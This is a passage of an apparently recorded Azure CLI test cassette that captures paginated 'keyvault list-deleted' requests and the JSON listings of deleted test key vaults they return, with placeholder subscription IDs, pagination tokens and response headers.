-000000000000/resourceGroups/clitest.rgpaxyqmbiqkr3hv5kwv6qtc2bfzafcyxsxlllfsidoai2uzlslp4letxrp2c4gy7az/providers/Microsoft.KeyVault/vaults/sfrp-cli-kv-fsgnpeycicld","location":"westus","tags":{},"deletionDate":"2020-03-06T19:21:02Z","scheduledPurgeDate":"2020-06-04T19:21:02Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/clibfqkkvbryo7v","name":"clibfqkkvbryo7v","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_cosmosdb_key_vault_key_uriyhtjiztz5xbothzprqgzzr5p25lr2p7bf5hzlxeb/providers/Microsoft.KeyVault/vaults/clibfqkkvbryo7v","location":"westus","tags":{},"deletionDate":"2020-03-06T19:20:20Z","scheduledPurgeDate":"2020-06-04T19:20:20Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY1da4MwAEX%2fi4y9aRJ16xTKmNiOdjWiJvY5xmjjNyaWrqX%2ffTK4cLhwuPdhDOKmT3JoleE%2fjPMuIzQzfOOi9aR8AHo2sFr0YtAWuy%2bzsPjYA7UUis9y0nIcFIAFqt7dDTJRUUHTLUtmMsEdkxeevbEr6L15EEzzeJWlmBWIJJ9HNVba%2bhG%2fOVs6DUrRCS3K%2f6I%2b2STN62qu41sbIs%2bEa9Dri2rXx7EVw5a2%2bTnNjySl6Z7scppRLz7RjlbhAUWkvsUhd%2bIwcmISubip75gcP9LmEmCSwIQEIV4dHLYoCrsgJV8Qt%2fvvpDm4mKQrufF8%2fgE%3d"}' headers: cache-control: - no-cache content-length: - '3340' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:36 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - ca76eea4-26a5-4128-a1c0-0635e84bb48b - 69ea5d9b-2f0a-4e97-a1ff-e97e8bf6d7c9 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY1da4MwAEX%2Fi4y9aRJ16xTKmNiOdjWiJvY5xmjjNyaWrqX%2FfTK4cLhwuPdhDOKmT3JoleE%2FjPMuIzQzfOOi9aR8AHo2sFr0YtAWuy%2BzsPjYA7UUis9y0nIcFIAFqt7dDTJRUUHTLUtmMsEdkxeevbEr6L15EEzzeJWlmBWIJJ9HNVba%2BhG%2FOVs6DUrRCS3K%2F6I%2B2STN62qu41sbIs%2BEa9Dri2rXx7EVw5a2%2BTnNjySl6Z7scppRLz7RjlbhAUWkvsUhd%2BIwcmISubip75gcP9LmEmCSwIQEIV4dHLYoCrsgJV8Qt%2FvvpDm4mKQrufF8%2FgE%3D response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/sfrp-cli-kv-hcgogy3lzugb","name":"sfrp-cli-kv-hcgogy3lzugb","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgpazwajtsmxipym6d2cdimlawj4rvmdmaz4idslbvu3napp2yquh522hzgsw5rdvzt/providers/Microsoft.KeyVault/vaults/sfrp-cli-kv-hcgogy3lzugb","location":"westus","tags":{},"deletionDate":"2020-03-06T19:10:23Z","scheduledPurgeDate":"2020-06-04T19:10:23Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/clitest6zil7b4cyttoc37wn","name":"clitest6zil7b4cyttoc37wn","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_sp_with_kv_existing_certury3hs2oydhjmxipryfkykiho6razkkkadqc44kt6y/providers/Microsoft.KeyVault/vaults/clitest6zil7b4cyttoc37wn","location":"westus","tags":{},"deletionDate":"2020-03-06T18:40:41Z","scheduledPurgeDate":"2020-06-04T18:40:41Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/clitestql3jbq26yespm2gsl","name":"clitestql3jbq26yespm2gsl","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_sp_with_kv_new_certsbdr3dhbmxr75yrov6nh4g6ezgvj7vxahsurfch6jguhdzb/providers/Microsoft.KeyVault/vaults/clitestql3jbq26yespm2gsl","location":"westus","tags":{},"deletionDate":"2020-03-06T18:39:17Z","scheduledPurgeDate":"2020-06-04T18:39:17Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-se-sd-ag32os","name":"cli-test-kv-se-sd-ag32os","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_secret_soft_deletehrx2jmpbszcbifyymdhavrijx74vaahn7olfndj/providers/Microsoft.KeyVault/vaults/cli-test-kv-se-sd-ag32os","location":"westus","tags":{},"deletionDate":"2020-03-06T18:30:08Z","scheduledPurgeDate":"2020-06-04T18:30:08Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-yc63nzz","name":"cli-test-kv-mgmt-yc63nzz","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtfxwe2cwts45figeuefkt3a2ljvoe7sd7i2drdjdtkfs4zxkmakrea/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-yc63nzz","location":"westus","tags":{},"deletionDate":"2020-03-06T18:28:31Z","scheduledPurgeDate":"2020-06-04T18:28:31Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY3dToMwAEbfhRjvoAXRCcniDYWoK2SlZZG7UgryT2iZc8veXWLy3Zzk5Hw3Y5QXfWjGThn%2bzTihlLLU8I1vrWflAzDwkddykKO2%2bHVdpCWmAai1UGJpZt1MowKwsKsXd2ebdlFB0y1LbnIpnkxReM7OqaD37EEwL9O5KeWiAG7EMqmp0tan%2fM342mtQyl5qWf6DeuNzY543c4vvHWh7JtxmPz6obnucOjnuWZedSPZBCSMhRRlLmZccWM%2bq4N3GtL4kgXAxPbpJgGHcChgH%2bStpa4cEzMVtHCVBGMUoRDFC8Nh2Pxh%2bOYTmEe5ydKTMuN%2f%2fAA%3d%3d"}' headers: cache-control: - no-cache content-length: - '3387' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:36 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - 545742e4-a69b-41cd-8fa3-5800bb3aa567 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY3dToMwAEbfhRjvoAXRCcniDYWoK2SlZZG7UgryT2iZc8veXWLy3Zzk5Hw3Y5QXfWjGThn%2BzTihlLLU8I1vrWflAzDwkddykKO2%2BHVdpCWmAai1UGJpZt1MowKwsKsXd2ebdlFB0y1LbnIpnkxReM7OqaD37EEwL9O5KeWiAG7EMqmp0tan%2FM342mtQyl5qWf6DeuNzY543c4vvHWh7JtxmPz6obnucOjnuWZedSPZBCSMhRRlLmZccWM%2Bq4N3GtL4kgXAxPbpJgGHcChgH%2BStpa4cEzMVtHCVBGMUoRDFC8Nh2Pxh%2BOYTmEe5ydKTMuN%2F%2FAA%3D%3D response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/clitest4a5g3l66eazz6ux6a","name":"clitest4a5g3l66eazz6ux6a","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rg7k75slkvpxpcv6a2zivgei4y4f2fueasgvzye7ia47axj4blyxbr2u7dt657wlylw/providers/Microsoft.KeyVault/vaults/clitest4a5g3l66eazz6ux6a","location":"westus","tags":{},"deletionDate":"2020-03-06T18:17:10Z","scheduledPurgeDate":"2020-06-04T18:17:10Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vault1560","name":"vault1560","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/fytest2/providers/Microsoft.KeyVault/vaults/vault1560","location":"westus","tags":{},"deletionDate":"2020-03-06T15:11:57Z","scheduledPurgeDate":"2020-06-04T15:11:57Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vaultaiapnil2uedxb7afczn","name":"vaultaiapnil2uedxb7afczn","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_storage_encryptionu6rptxozfwc55omt34n7dhpyrpko73t76hc2uvyycoqkjqsv/providers/Microsoft.KeyVault/vaults/vaultaiapnil2uedxb7afczn","location":"westus","tags":{},"deletionDate":"2020-03-04T15:23:28Z","scheduledPurgeDate":"2020-06-02T15:23:28Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vaultwtmwswmc5r2x3glx43s","name":"vaultwtmwswmc5r2x3glx43s","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_storage_encryption2tzl2ycxjauutkza3hhbk2b7rd2jna2ni42rhvbxjinpsbac/providers/Microsoft.KeyVault/vaults/vaultwtmwswmc5r2x3glx43s","location":"westus","tags":{},"deletionDate":"2020-03-04T15:20:58Z","scheduledPurgeDate":"2020-06-02T15:20:58Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vaulty6grzweil7vrhcz7umn","name":"vaulty6grzweil7vrhcz7umn","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_storage_encryption25jbpwcuqmtf24zjhzvdrdg4z2kpsgnki742bhgunadxx7rp/providers/Microsoft.KeyVault/vaults/vaulty6grzweil7vrhcz7umn","location":"westus","tags":{},"deletionDate":"2020-03-04T15:17:08Z","scheduledPurgeDate":"2020-06-02T15:17:08Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY1da4MwAEX%2fi4y9aRK16xTKXkyhW1WiiaV7izF21k9M7Jyl%2f70yuA%2f3wOXcu9HJWR%2brrlaGfzdOOKUsNXzjR%2btB%2bQC0vOMX2cpOW3yZRmmJvgVqypUYq0FXfacAzFH55m6RifISmm5RcJNL4Zgi9%2bytXUJv40EwjP2tKuSoQFiJsVd9qa0v%2bZfxqdGgkI3UsvgH9cGHyryty1W%2bsyHyTLgGvb6oen3sa9ntWJ2dkuyTJizZU5yxlHnxkTWsDA4opJc5Dmo7osJZ%2bxIGeBMF2TthZzfG55kw4kR4H0TBN47ZwSU1%2bSVUoOjKFnINnQhi4%2fF4Ag%3d%3d"}' headers: cache-control: - no-cache content-length: - '3402' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:37 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - 3cbb0fe9-2c4e-4825-94be-c00adeea9b5c status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY1da4MwAEX%2Fi4y9aRK16xTKXkyhW1WiiaV7izF21k9M7Jyl%2F70yuA%2F3wOXcu9HJWR%2BrrlaGfzdOOKUsNXzjR%2BtB%2BQC0vOMX2cpOW3yZRmmJvgVqypUYq0FXfacAzFH55m6RifISmm5RcJNL4Zgi9%2BytXUJv40EwjP2tKuSoQFiJsVd9qa0v%2BZfxqdGgkI3UsvgH9cGHyryty1W%2BsyHyTLgGvb6oen3sa9ntWJ2dkuyTJizZU5yxlHnxkTWsDA4opJc5Dmo7osJZ%2BxIGeBMF2TthZzfG55kw4kR4H0TBN47ZwSU1%2BSVUoOjKFnINnQhi4%2FF4Ag%3D%3D response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vault2v23dmgnsthhlhcdjba","name":"vault2v23dmgnsthhlhcdjba","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_storage_encryptiongv35yr4gkn2iiqkm45wat3ufnfyzxj42pv7q7nwnvcmuzs2u/providers/Microsoft.KeyVault/vaults/vault2v23dmgnsthhlhcdjba","location":"westus","tags":{},"deletionDate":"2020-03-04T15:14:43Z","scheduledPurgeDate":"2020-06-02T15:14:43Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vaultqyzsf4snib7hd7h7e6l","name":"vaultqyzsf4snib7hd7h7e6l","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_storage_encryptionbnhdrovdkjrvggfvgdwfojaiombph3qqa7foj4t3axapr52m/providers/Microsoft.KeyVault/vaults/vaultqyzsf4snib7hd7h7e6l","location":"westus","tags":{},"deletionDate":"2020-03-04T15:10:49Z","scheduledPurgeDate":"2020-06-02T15:10:49Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vaultohd23akteocqq5t62c2","name":"vaultohd23akteocqq5t62c2","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_storage_encryptionr2betf2ej2nxkwebdpd2bgl7bqnfbot5tlt4x3sm4x2cv7kx/providers/Microsoft.KeyVault/vaults/vaultohd23akteocqq5t62c2","location":"westus","tags":{},"deletionDate":"2020-03-04T15:04:55Z","scheduledPurgeDate":"2020-06-02T15:04:55Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-6k6on42","name":"cli-test-kv-mgmt-6k6on42","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtg2mnfi76ehtn2ajrix33emd4kuxt2stpdv4ffnwo7wuf64552nlws/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-6k6on42","location":"westus","tags":{},"deletionDate":"2020-03-02T07:49:03Z","scheduledPurgeDate":"2020-05-31T07:49:03Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-vkmuam4","name":"cli-test-kv-mgmt-vkmuam4","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtgid5y7kddyebnlltfidkdrzmw5njceb3ka62cwmdaeti5vvrpmizy/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-vkmuam4","location":"westus","tags":{},"deletionDate":"2020-03-02T07:34:27Z","scheduledPurgeDate":"2020-05-31T07:34:27Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY1da4MwAEX%2fSxh7i4nOrVMoo6CFbo0yTSzbW9To4jcmtl1K%2f%2ftkcF8unHvuDQziqo9yaBXwb%2bAUppSlwAc%2fWk%2fKR6jnA69FLwZtcbPMwirGHqklV8UsJy3HQSGc29WLu7GhnVcYumXJIRfFEyxyz9k4FfaePYymeTzLUswKEVnMoxorbX2I34wvnUal6IQW5X9Rb3yS8LySq3zrYNuDeI39%2bKDa9XFsxbBlbXZKsneasGRPw4ylzIuPrGNVcLAJra8xDZ2oIYY0O4eY3TUy2WvCDk5C60tMv8NPQy5R0O0j05ooKFzSfuGo6cKErRtTg%2fv9Dw%3d%3d"}' headers: cache-control: - no-cache content-length: - '3507' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:37 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - 16679764-e5e0-404d-b435-253f334325e7 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY1da4MwAEX%2FSxh7i4nOrVMoo6CFbo0yTSzbW9To4jcmtl1K%2F%2FtkcF8unHvuDQziqo9yaBXwb%2BAUppSlwAc%2FWk%2FKR6jnA69FLwZtcbPMwirGHqklV8UsJy3HQSGc29WLu7GhnVcYumXJIRfFEyxyz9k4FfaePYymeTzLUswKEVnMoxorbX2I34wvnUal6IQW5X9Rb3yS8LySq3zrYNuDeI39%2BKDa9XFsxbBlbXZKsneasGRPw4ylzIuPrGNVcLAJra8xDZ2oIYY0O4eY3TUy2WvCDk5C60tMv8NPQy5R0O0j05ooKFzSfuGo6cKErRtTg%2Fv9Dw%3D%3D response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-l6gqlwb","name":"cli-test-kv-mgmt-l6gqlwb","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtq7y3lskalwdbuoxywtvrwcajcksnondtnano6rpmmgr4jgzwtkmnc/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-l6gqlwb","location":"westus","tags":{},"deletionDate":"2020-02-28T18:16:55Z","scheduledPurgeDate":"2020-05-28T18:16:55Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-5jrpjwd","name":"cli-test-kv-mgmt-5jrpjwd","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtqamrsxyjaqszhpmw2zgtiwmwsacwyfnbj7y5kagca6mh7xrarq64c/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-5jrpjwd","location":"westus","tags":{},"deletionDate":"2020-02-25T08:26:59Z","scheduledPurgeDate":"2020-05-25T08:26:59Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-mfrxc43","name":"cli-test-kv-mgmt-mfrxc43","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtmy7hspqa6z6tpxul2gyzkaytun2l6exaxdmiyw7v3on5cfojhfxbq/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-mfrxc43","location":"westus","tags":{},"deletionDate":"2020-02-21T18:13:55Z","scheduledPurgeDate":"2020-05-21T18:13:55Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-qaj7rat","name":"cli-test-kv-mgmt-qaj7rat","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtm2unkwtfyebzdvwskp2vu6rh3xnsluvdydvg2jvpjstsw4mxeex2i/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-qaj7rat","location":"westus","tags":{},"deletionDate":"2020-02-14T18:13:02Z","scheduledPurgeDate":"2020-05-14T18:13:02Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-feogfe7","name":"cli-test-kv-mgmt-feogfe7","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtn4bxj5b3im75ipnetnecq6qlz3a4u7jaahs7d7p4l3eakq53wqlmt/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-feogfe7","location":"westus","tags":{},"deletionDate":"2020-02-13T15:51:31Z","scheduledPurgeDate":"2020-05-13T15:51:31Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY1Ra4MwAIT%2fi4y9xRjbrlMoe1gcrKuRamLpY4zRWTWKid209L%2fXDe4eDr67u1lK%2fppDpWpt%2bTfrFCSUJZZvfRvTax%2fCliteylYqY%2fN5HKQtuhbqMdNiqHpTdUpDJ0PFy3qLAMoKB6zznAMuxQqIzHO3buF4G8%2bB%2fdBdq1wOGoaVGDrdFcb%2bklPKx8bAXDbSyPw%2f6DfeV%2bC6kMv4znWQB5xF6PlJ18tjV0u1Y3V6itM9jVn8QYOUJcyLDqxhBf5EIS2nEJ83IRU%2fERZzOIdTRNNXQs8rgoVLLmIiOEAEN%2b%2bLg2MdTMdL7RK8D%2f66BJfW%2ff4A"}' headers: cache-control: - no-cache content-length: - '3515' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:38 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - 0f74358f-680c-45ad-8c6b-9bd26ec5f652 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY1Ra4MwAIT%2Fi4y9xRjbrlMoe1gcrKuRamLpY4zRWTWKid209L%2FXDe4eDr67u1lK%2FppDpWpt%2BTfrFCSUJZZvfRvTax%2FCliteylYqY%2FN5HKQtuhbqMdNiqHpTdUpDJ0PFy3qLAMoKB6zznAMuxQqIzHO3buF4G8%2BB%2FdBdq1wOGoaVGDrdFcb%2BklPKx8bAXDbSyPw%2F6DfeV%2BC6kMv4znWQB5xF6PlJ18tjV0u1Y3V6itM9jVn8QYOUJcyLDqxhBf5EIS2nEJ83IRU%2FERZzOIdTRNNXQs8rgoVLLmIiOEAEN%2B%2BLg2MdTMdL7RK8D%2F66BJfW%2Ff4A response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-uanigtk","name":"cli-test-kv-mgmt-uanigtk","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtmfetyhfkrndfjg4jms5jkcr3v5aocbxbozh4ncuqfbyuz3m53fdb5/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-uanigtk","location":"westus","tags":{},"deletionDate":"2020-02-13T11:31:23Z","scheduledPurgeDate":"2020-05-13T11:31:23Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-3n5c5lf","name":"cli-test-kv-mgmt-3n5c5lf","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtwj7wpdaozfsj5eawvbzo534rr3246a3yakfkqkeiyblwei75umfnr/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-3n5c5lf","location":"westus","tags":{},"deletionDate":"2020-02-13T09:08:22Z","scheduledPurgeDate":"2020-05-13T09:08:22Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-oumqwe6","name":"cli-test-kv-mgmt-oumqwe6","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtc6b2udw3yzmqxmxsoitl4n3ifph2fwzkwxzpvfehlutykjgqemdao/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-oumqwe6","location":"westus","tags":{},"deletionDate":"2020-02-13T08:54:03Z","scheduledPurgeDate":"2020-05-13T08:54:03Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-4hisfb3","name":"cli-test-kv-mgmt-4hisfb3","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt44mqviyyvl43nl7oce55uabepyfwfufhiuwlh3ldtfsrvvy5etbho/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-4hisfb3","location":"westus","tags":{},"deletionDate":"2020-02-13T08:44:03Z","scheduledPurgeDate":"2020-05-13T08:44:03Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-5pzgaif","name":"cli-test-kv-mgmt-5pzgaif","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtf4ndiusv2davut3jamm7bcewktq7axgi7pq6u2pbyp3d4p6hpvabb/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-5pzgaif","location":"westus","tags":{},"deletionDate":"2020-02-13T07:32:54Z","scheduledPurgeDate":"2020-05-13T07:32:54Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY1ta4MwAIT%2fi4x90yTq1imUsWEK26pSTSz9GGO0wVdM7NTS%2fz4ZHBwHz9